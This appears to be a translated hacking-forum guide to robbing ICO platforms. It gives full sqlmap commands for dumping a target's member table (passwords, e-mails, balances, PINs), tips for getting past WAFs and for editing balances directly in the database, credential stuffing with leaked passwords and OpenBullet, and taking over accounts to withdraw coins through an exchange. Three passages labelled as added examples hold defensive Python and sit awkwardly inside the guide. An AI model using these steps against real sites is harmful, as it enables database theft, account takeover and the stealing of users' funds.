Introduction
In this article I will describe a genuinely working scheme for raising money with almost no investment and in a short time. Each stage is covered in detail so that no questions remain, but if you have any, welcome to the comments. We will be searching for vulnerable ICOs, dumping them, and withdrawing tokens from them to exchanges, and so on. To those who dump, this article will seem very familiar, but even they will find something new, because there will be a practical plan of action. I am sure there will definitely be some haters whose bread I am taking with this article.
Finding a Target
Finding the right target is half the battle, and it determines how successful our venture will be. We need ICO projects with small but not insignificant traffic; about 20k views per month is enough. Information about views can be found on the appropriate sites [1].
The next criterion is the withdrawal conditions of the ICO. We need to find an ICO where a valid e-mail is not needed for withdrawal, or, if it is needed, one that can be changed without any difficulty. Ideally, withdrawal should require at most a PIN code or a two-factor authentication code; in general it would be nice if withdrawal needed no confirmation at all, but best of all is a 6-digit PIN code.
So where do we find such targets? We will borrow them from our fellow hackers who mainly do brute forcing. I think everyone knows software such as Keeper, Bullet and UBC; on these platforms people write brutes and checkers for all sorts of services, including ICOs. I will look on one of the neighbouring boards, in the next branch.
So go and look at the topics; usually they contain a description of these sites, when they pay out and what is needed to withdraw. In general, look for ICOs matching the criteria listed above; some topics will have a guide, and we can ask for it in private messages. Collect the names of all the ICO sites in one text file.
Web scanners
Now that we have collected a decent number of ICOs, we need to check each target in a web scanner.
The most common scanners are Netsparker, Acunetix, OWASP ZAP and Burp Suite. As you can see, there are scanners for every taste, but I advise using all of them one by one: what Netsparker missed, Acunetix may find, and what both of them missed, Burp may find. I have used all of these scanners; I like Netsparker the most, OWASP ZAP is a little weak, and Burp outdoes them all. However, it is worth noting that different versions of Netsparker behave differently: one version can find a hole and another cannot. I use the following versions: 4.9.5.18523 and 5.9.1.29030.
We need to configure the scanners to search for SQL injection. I will show this using Netsparker as an example; in the other scanners the situation is almost the same, differing only in minor details.
First click Scan Policy Editor, duplicate the main preset, rename it as you like, and in the Security Check Group leave only the checkbox next to SQL Injection. You can also use the scanners to search for other vulnerabilities (LFI, XSS, XXE, etc.), but we are not interested in those now; just save the settings.
Click the button to start scanning, specify the link to the site we want to scan, and select the preset we just created. If the site has security mechanisms that generate special cookies, just open the site in your browser, wait until you are let through, then paste those cookies into the appropriate window in Netsparker. Start the scan and go about your business.
If the site is vulnerable, at the end of the scan you will see a red circle with an exclamation mark; click it and it will show where the vulnerability is. It may be that the site is vulnerable in several places; there is no luck in this. If you scanned the main domain and found nothing, try scanning all the subdomains; in this case I scanned the subdomain to which you are redirected when logging in to the site.
Right-click the vulnerable location ("/auth/email_chk (val2 (POST),val1)") and a context menu pops up in which the line "Copy sqlmap Command" stands out in bold; logically, it copies the sqlmap command to the clipboard. Let's see what we copied.
As you can see, the picture is not very pretty. I prefer to make a request file and feed that to sqlmap; to me the command is cleaner and more concise that way. To make a request file, click the vulnerable location ("/auth/email_chk (val2 (POST),val1)"), choose the HTTP Request/Response tab, copy all the data into any text file, and be sure to remove the payload that Netsparker inserted automatically (sqlmap should substitute its own). Also remove the unnecessary and garbage headers that are superfluous; compare the screenshot from Netsparker above with the screenshot of the text file and you will understand everything.
Save it all in a convenient place and move on to the next part.
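The scanner finding above is an e-mail check that splices a POST parameter into SQL. The following is an added illustration, not the site's code: a constructed vulnerable lookup modelled on val1/val2 beside its parameterized form, using an in-memory SQLite table with assumed schema and rows in place of the MySQL database.

```python
"""Constructed model of the bug class behind the /auth/email_chk finding:
string-built SQL versus a bound parameter. Added example, not the site's
code; table name, columns and rows are assumptions."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # In-memory stand-in for the site's MySQL database; rows are constructed.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (mem_id TEXT, email TEXT, mem_pw TEXT)")
    conn.executemany(
        "INSERT INTO member VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "$2b$12$constructed-hash-1"),
         ("bob", "bob@example.com", "$2b$12$constructed-hash-2")],
    )
    return conn


def email_exists_vulnerable(conn: sqlite3.Connection, val2: str) -> bool:
    # The request parameter lands verbatim inside the statement, so the
    # caller controls SQL grammar, not just a value. This is what a scanner
    # flags on the val2 parameter.
    sql = f"SELECT COUNT(*) FROM member WHERE email = '{val2}'"
    return conn.execute(sql).fetchone()[0] > 0


def email_exists_safe(conn: sqlite3.Connection, val2: str) -> bool:
    # Bound parameter: the value travels separately from the statement, so
    # quotes inside val2 are data, never syntax.
    row = conn.execute(
        "SELECT COUNT(*) FROM member WHERE email = ?", (val2,)
    ).fetchone()
    return row[0] > 0


def demo() -> dict:
    """Run both forms against a real address and a constructed tautology probe."""
    conn = make_db()
    probe = "nobody@example.com' OR '1'='1"  # constructed: no such address exists
    return {
        "vuln_real": email_exists_vulnerable(conn, "alice@example.com"),
        "vuln_probe": email_exists_vulnerable(conn, probe),  # query logic altered
        "safe_real": email_exists_safe(conn, "alice@example.com"),
        "safe_probe": email_exists_safe(conn, probe),  # probe treated as a literal
    }


if __name__ == "__main__":
    print(demo())
```

The safe form answers False for the probe because no row has that literal e-mail; the vulnerable form answers True for an address that does not exist, which is exactly the discrepancy a scanner keys on.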
Sqlmap
In this part I will look directly at how to dump the site's database. Before you start dumping, be sure to update sqlmap [2] to the latest version. So, the command that Netsparker gave us looks like this:
sqlmap.py -u "https://master.*****.com/auth/email_chk" -p "val2" --risk="3" --level="3" --method="POST" --data="val1=netsparker%40example.com&val2=test" --user-agent="Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36" --cookie="__zlcmid=13IjuPSLHgWcLj8; ci_session=76vvdh8ren0vgikibjpvhe0mm9bspb5r" --headers="Host:master.***.com\nAccept:application/json, text/javascript, */*; q=0.01\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded; charset=UTF-8\nOrigin:https://master.****.com\nReferer:https://master.****.com/auth/signup\nX-Requested-With:XMLHttpRequest" --dbms="MySQL" --batch
After our shamanic efforts with the request file, it turns into the following:
sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --dbs
I think the difference is quite noticeable. So let's see what each argument means, and also look at some other things you should know.
-u specifies the link to the target we want to dump. --method specifies the request method; in our case it is a POST request. If we find a site vulnerable via a GET parameter, it is in some ways more convenient to specify the link not through the request file but through the -u argument (for example, if we have a GET rather than a POST: sqlmap.py -u "https://master.*****.com/auth/email_chk.php?val2=test" -p val2 --risk=3 --level=3 --dbms=MySQL --batch --dbs --random-agent). The --data parameter specifies the POST data to send; with the GET method it is absent. There are also the user agent (--user-agent), headers (--headers) and cookies (--cookie).
All of the above we simply put into the request file, which tidies everything up; I prefer to do it this way and so should you.
-p indicates the vulnerable parameter; in our case it is val2. Check in Netsparker which parameter you have, and also check there what DBMS the site uses; in my case it is MySQL.
--batch never asks for user input and uses the default behaviour.
--dbs lists the databases.
You can read about the different --level and --risk values in the sources [3].
There is also an important argument that is not in our command but is practically obligatory: it specifies the SQL injection technique. In some cases sqlmap may not exploit the injection at all without it; I have had very many cases where sqlmap simply could not get the injection working without this parameter, so it is better to add it. The --technique argument can take several values, EUQBST; each letter means a different technique, and you can specify several letters at once.
Blind
B: Boolean-based blind
S: Stacked queries
T: Time-based blind
Regular
E: Error-based
U: Union query-based
Q: Inline queries
In our case I add --technique=E.
If you get a picture like this, it means sqlmap successfully exploited the injection and obtained the database names.
Now all we have to do is browse the tables, select the right one, and dump the data from it. Let's return to our command.
sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --dbs --technique=E
Now that we have the database names, we no longer need the --dbs argument; remove it and change the command as follows.
sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --technique=E -D master_wallet --tables
With -D we select the database; --tables asks for its tables.
Now among the tables we look for the one that presumably stores user data; in our case it is the member table, though yours may have another name (e.g. users or something similar), so look at the circumstances. Now we get the columns: -D master_wallet -T member --columns.
Now that we have the columns, roughly choose what we need. In my case I need the login, password, e-mail, balance, name and PIN code; other data is of secondary importance to me. Specify the columns we need and dump them; the resulting command is this:
sqlmap.py -r target.txt -p val2 --risk=3 --level=3 --dbms=MySQL --batch --technique=E -D master_wallet -T member -C mem_id,email,mem_pw,mem_name,gcc,deal_pw,mem_name,mobile --dump --threads=10
This will start dumping the site; if you suddenly need to stop it, press Ctrl+C.
Start from a specific row: --start=1000
Everything you dump is stored in AppData\Local\sqlmap\output, but you can change this path with the --output-dir argument.
You can read about the other sqlmap parameters in the documentation [4].
WAFs and other shit
While our site is being dumped, I would like to make a small digression and answer the main question that has been begging since the beginning: "what about tampers?"
From my experience, if you used Netsparker to search for an injection and it reported a hole, you most likely will not need any tampers; if the injection is not working, it is because you did something wrong. Try playing with the levels and risks, and you can also try adding the --no-cast or --hex arguments (more info in the docs).
Sqlmap itself kind of knows how to detect all sorts of WAFs, but the key word here is "kind of"; the best way to identify a WAF is to use the whatwaf [5] and wafw00f [6] tools.
They will suggest tampers; then you just need to add them to your command, and if several tampers are suggested, try each in turn or combine them.
Regarding tampers, I cannot say anything specific about which one to use where, because there are very many WAFs, almost all of them are individual, and each needs its own approach. The same Cloud can be bypassed by specifying the real IP address of the site (you can google plenty of manuals) and the site host (-u "ip/auth/email_chk.php?val2" --host="master.*****.com").
If you want, you can read additional material about tampers [7].
NaviCat and PHPMyAdmin (Full Access)
Still an aside..
You just have to read it! It happens that you get a vulnerable site, but the injection is blind or the database is so big that dumping takes very long; then you can try connecting to the database directly without an injection. If the administrator is careless, you can also find artifacts on the site such as PHPMyAdmin: just try adding /phpmyadmin/ to the site, and it may turn out that there is a panel the sysadmin forgot about.
If you can't find the panel, try scanning the ports ("nmap site.com"); we need port 3306, where MySQL lives.
If this port is open, we can connect to the server via NaviCat [8]. But now we need credentials for MySQL; where can we get them? I hope you have not forgotten the sqlmap documentation.
Add the --passwords argument to the command and boom, this is what we get in the end. We got the user names and their password hashes; don't rush to cancel the prompt, let it try to crack the passwords, it is likely to crack some of them after all.
We are interested in the root account. Here we have hashed passwords; to crack them you need the hash and a password database, you must have heard how that works. So what do we do once we've cracked the passwords and got access to the account? Whatever we want, because now we have full access to the database; we could delete it, but that's not what we are interested in. We can download the database in a very short time, because now we have direct access; the database is pulled out in *.sql format, and to read the data afterwards you can use the ancient software SQLRip [9].
To connect to a database with port 3306 open, download NaviCat, click Connection, in the context menu select your DBMS (in my case MySQL), after which we see this window.
Connection name: write whatever we want, for example the name of the site we're attacking.
Host: ping the site in cmd and type in its IP address.
User: the username of the account you cracked; look closely at the sqlmap screenshot above, the root user's hash is duplicated under another username, and it is this username that we enter.
Password: no comment.
Or we can tweak the balance of some users and add a couple of zeros. Here everything depends only on your knowledge of SQL itself, which is very easy, and even if you don't know it you can simply google what you need; this is if you have phpMyAdmin. If you have NaviCat, you get ecstasy from the fact that there's no need to write a line of code, just change the data itself and NaviCat will do the rest for you; very powerful software. This is how you edit data in NaviCat.
There’s not much on the internet about this, so keep that in mind.
Hashes and the two Antipublics
Let's go back to the ICO we are leaking. Since we live in the 21st century, what does that mean? That's right! It means nobody uses md5 and other "weak" hashes any more; nowadays almost all websites hash passwords with bcrypt, which makes the work of dumpers harder, because not everyone is ready to pay for this. Bcrypt hashes take a very long time to crack by design, so everyone uses them; even the smallest garage company uses bcrypt, and rightly so! I would use it too if I ran a site. But we're not running a site, we're attacking it.
So in our dump the passwords are hashed with bcrypt. The first thought you might have is to try cracking them with a hash cracker, but after you see how long it takes you'll probably think about giving up on the whole thing; but that's not the case. The truth is that everyone uses the same strings with minor differences, and it is likely that half of the users in your database (maybe more, maybe less) have already used the same password somewhere else and it was leaked on the internet; this is the main reason to choose an ICO where a PIN or 2FA is needed for withdrawal. So we sort the database by balance, take the e-mails and logins, and if you or your friends have your own antipublic, you can pull lines from the AP with ItemSearch [10]. If that finds nothing, we can buy access to muzzle [11] and pull passwords from it, but if we are on a bum starter pack, there is a two-day trial with the possibility of looking up passwords for 1k e-mails. I did that, because 1k e-mails was enough for me; I took the trial and wrote a small script [12] in Delphi which picks up the passwords.
However, authorization on the site is only by username and password, so I wrote another script [13] which matches the passwords found for the e-mails to the logins.
That is, I have the following: login,email,hashpass and email:pass; the e-mails are compared and by substitution we get login:pass. Or you can just take the passwords that muzzle finds, the local AP, etc. and make a wordlist for the hashes. I will not publish the code of both scripts here, because the article is already too long, but I will leave the sources for you to download and read. You can find all the links at the end of the article.
Brute
Now that we have made a selection, the stars are aligned and we have a small login:pass base, we need to check it for hits. Since we were looking for our ICO among the projects on Keeper, Bullet and UBC, there is a project for this ICO; Bullet [14] is free and we can just download it and feed our base to it for brute forcing, but Keeper and UBC are paid software, and since this article is about spending $0, let's try to write a brute for our ICO ourselves.
Open the site for which we will write the brute and press Ctrl+Shift+J (I have Yandex Browser); a panel opens on the right, select the Network tab (this is our sniffer), enter any username and password and press Enter. On the left, under Name, a link should appear; click it and we will see a picture almost identical to the one in Netsparker when we built the request file. We also need to take the headers and post data (Form Data is the same as Post Data, where id is our login and pw is our password). It happens that a token is also in there; then we first need to make a GET request to the main page, parse out the token, and then paste it into our post data. In general, writing a brute deserves a separate article, because there is a lot of information and many small details, so we will not go into them here. Details about writing brutes can be found on the Internet, and even better, take ready-made working configs from the Internet that are open for editing; by looking at them you will learn to make projects.
In the Response tab, to the right of Headers, we can see the data that came back in the response.
This came back for random data:
{"result": "N", "msg": "This ID is not checked."}
This is for data where the password is wrong:
{"result": "N", "msg": "Please check the input."}
And this is a good one:
{"result": "Y", "msg": "Login Successful"}
Judging by these answers and headers we build the project. Open Bullet, go to Configs -> New, specify the project name, click the plus sign on the left, in the window that appears choose Request and fill it in according to the data from the sniffer.
I think you get the idea. Save the project, run it and wait for the hits to accumulate. This part of the article is a bit rushed, but if you have any questions or need help writing a more complex brute, for example for a mobile app, don't hesitate to ask.
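From the defending side, the login traffic this section describes has a recognisable shape, and the two distinct failure messages tell a caller whether an ID exists. The following is an added example, not code from the article: detection logic over a constructed JSON-lines access log whose response bodies are the three JSON replies shown above; the log format, window and thresholds are assumptions.

```python
"""Credential-stuffing detection over constructed login-endpoint records.
Added example, not the article's code; log format, window and thresholds
are assumptions. Response bodies follow the JSON replies quoted above."""
import json
from collections import defaultdict

# Constructed JSON-lines access log: one record per POST to the login endpoint.
SAMPLE_LOG = """\
{"ts": 1000, "ip": "203.0.113.5", "id": "alice", "resp": {"result": "N", "msg": "Please check the input."}}
{"ts": 1001, "ip": "203.0.113.5", "id": "bob", "resp": {"result": "N", "msg": "This ID is not checked."}}
{"ts": 1002, "ip": "203.0.113.5", "id": "carol", "resp": {"result": "N", "msg": "Please check the input."}}
{"ts": 1003, "ip": "203.0.113.5", "id": "dave", "resp": {"result": "Y", "msg": "Login Successful"}}
{"ts": 1004, "ip": "203.0.113.5", "id": "erin", "resp": {"result": "N", "msg": "This ID is not checked."}}
{"ts": 1005, "ip": "203.0.113.5", "id": "frank", "resp": {"result": "N", "msg": "Please check the input."}}
{"ts": 1010, "ip": "198.51.100.7", "id": "alice", "resp": {"result": "N", "msg": "Please check the input."}}
{"ts": 1015, "ip": "198.51.100.7", "id": "alice", "resp": {"result": "Y", "msg": "Login Successful"}}
"""

WINDOW_SECONDS = 60    # assumed window measured from a source's first request
MIN_DISTINCT_IDS = 5   # assumed threshold: many different accounts from one source


def parse_log(text: str) -> list:
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def stuffing_report(records: list) -> dict:
    """Per source IP: distinct IDs tried in the window, failures, successes,
    whether the source trips the stuffing threshold, and whether the server's
    own replies let that source tell valid IDs from invalid ones."""
    by_ip = defaultdict(list)
    for rec in records:
        by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = recs[0]["ts"]
        window = [r for r in recs if r["ts"] - start <= WINDOW_SECONDS]
        ids = {r["id"] for r in window}
        failures = [r for r in window if r["resp"]["result"] == "N"]
        successes = [r for r in window if r["resp"]["result"] == "Y"]
        # Two different failure texts means the endpoint reveals ID validity.
        fail_msgs = {r["resp"]["msg"] for r in failures}
        report[ip] = {
            "distinct_ids": len(ids),
            "failures": len(failures),
            "successes": len(successes),
            "flagged": len(ids) >= MIN_DISTINCT_IDS,
            "id_enumeration_leak": len(fail_msgs) > 1,
        }
    return report


def compromised_accounts(records: list) -> list:
    """IDs that logged in successfully from a flagged source: candidates for
    an immediate session revoke, withdrawal hold and forced password reset."""
    report = stuffing_report(records)
    hits = {r["id"] for r in records
            if report[r["ip"]]["flagged"] and r["resp"]["result"] == "Y"}
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print(json.dumps(stuffing_report(recs), indent=2))
    print("lock:", compromised_accounts(recs))
```

The enumeration flag is the cheap fix: returning one uniform failure message removes the signal, while the per-source counts drive rate limiting and account holds.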
Withdrawal to and from the exchange
After we found hits, we need to withdraw the balance from the ICO to an exchange. Look on the site for which exchanges we can withdraw to, and choose one that does not require verification with documents; in our case it is Latoken. The first time I tried to do something there I got an error because I was on a US VPN, so be careful; in the USA they choke bitcoins, use a VPN of another country.
I don't know how it will be for you; personally, withdrawals were only on Wednesdays at a certain time. To confirm the withdrawal it was necessary to enter a temporary code sent to the e-mail and the 6-digit PIN code that we had in our database. The system is such that to change the PIN code you need a valid e-mail, and to change the e-mail you need the PIN code. Therefore, I first changed the e-mail to mine, because I knew the PIN code, and then confirmed the withdrawal with the code that came to the e-mail and the 6-digit PIN code from the database.
Then, when the coins arrive at the exchange (usually with delays, you have to wait a bit), just sell them for bitcoins and withdraw them to your wallet; that's all.
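The withdrawal flow described above fails because a PIN stored in clear in the database was enough to rotate the e-mail and then approve a withdrawal. The following is an added model of the controls that close that loop, not the site's code: the PIN is stored as a salted, stretched hash, an e-mail change also needs confirmation from the old mailbox, and a contact change starts a withdrawal hold. The hold length, lockout count and PBKDF2 parameters are assumptions.

```python
"""Withdrawal-control model closing the PIN/e-mail loop described above.
Added example, not the site's code; hold period, lockout count and hashing
parameters are assumptions chosen for illustration."""
import hashlib
import hmac
import os

HOLD_AFTER_CONTACT_CHANGE = 24 * 3600  # assumed: no withdrawals for 24h after an e-mail change
MAX_FAILED_PIN = 5                     # assumed lockout; a 6-digit PIN has only 1e6 values


def hash_pin(pin: str, salt: bytes = None) -> tuple:
    # Salted, stretched hash: a database dump no longer yields the PIN itself.
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pin.encode(), salt, 200_000)


class Account:
    def __init__(self, email: str, pin: str):
        self.email = email
        self.salt, self.pin_hash = hash_pin(pin)
        self.contact_changed_at = None
        self.failed_pin = 0

    def check_pin(self, pin: str) -> bool:
        # Lock after repeated failures so the small PIN space cannot be walked.
        if self.failed_pin >= MAX_FAILED_PIN:
            return False
        ok = hmac.compare_digest(hash_pin(pin, self.salt)[1], self.pin_hash)
        self.failed_pin = 0 if ok else self.failed_pin + 1
        return ok

    def change_email(self, new_email: str, pin: str, old_mailbox_confirmed: bool, now: int) -> bool:
        # The PIN alone is never enough: the current mailbox must confirm the
        # change, and the change itself starts a withdrawal hold.
        if not (self.check_pin(pin) and old_mailbox_confirmed):
            return False
        self.email = new_email
        self.contact_changed_at = now
        return True

    def can_withdraw(self, pin: str, email_code_ok: bool, now: int) -> bool:
        # Recent contact change: refuse regardless of PIN and e-mail code.
        if (self.contact_changed_at is not None
                and now - self.contact_changed_at < HOLD_AFTER_CONTACT_CHANGE):
            return False
        return self.check_pin(pin) and email_code_ok


if __name__ == "__main__":
    acct = Account("owner@example.com", "123456")  # constructed account
    # Correct PIN from a dump but no confirmation from the old mailbox: refused.
    print(acct.change_email("new@example.com", "123456", False, now=0))
```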
A few words here and there yes ..
Now a few points that I purposely left out so as not to break the narrative of the article:
If you find a cookie in the database, you can forget about writing the brute and picking up passwords, because you won't need anything else to log in.
You can use sqlmap itself to search for vulnerabilities.
If you have a blind injection, you can use the DNS exfiltration technique (--dns-domain) to speed up dumping; you can google it easily.
If you have a stacked-queries injection type and a DBA account (--is-dba), you can get a shell (--os-shell).
If you don't have enough hits, you can try the e-mail accounts themselves and use them to restore the accounts.
If the site has 2FA, then you should have dumped the column that stores the Google Authenticator keys; add the key to your mobile authenticator (Enter a setup key) and use the generated codes.
The database may well store private keys from different wallets; be careful, otherwise you can miss a lot of money.
Conclusion
That's actually the end of the article; I've disclosed a very profitable scheme that doesn't cost a penny to carry out. This is a very big topic, and it is difficult to cover all of the tools in one article without forgetting anything. In my view each tool deserves its own article, because there is so much information on them that it could make a whole series. No matter how good your tools are, you won't reach their full potential without sufficient experience and skill. I've shown the basic and most significant points, but even they are enough to pull off something like this on your own. If after reading the article you have questions you can't find answers to, I will be happy to answer them; I can also help with exploiting an SQL injection, writing a brute, etc. Thank you for your attention!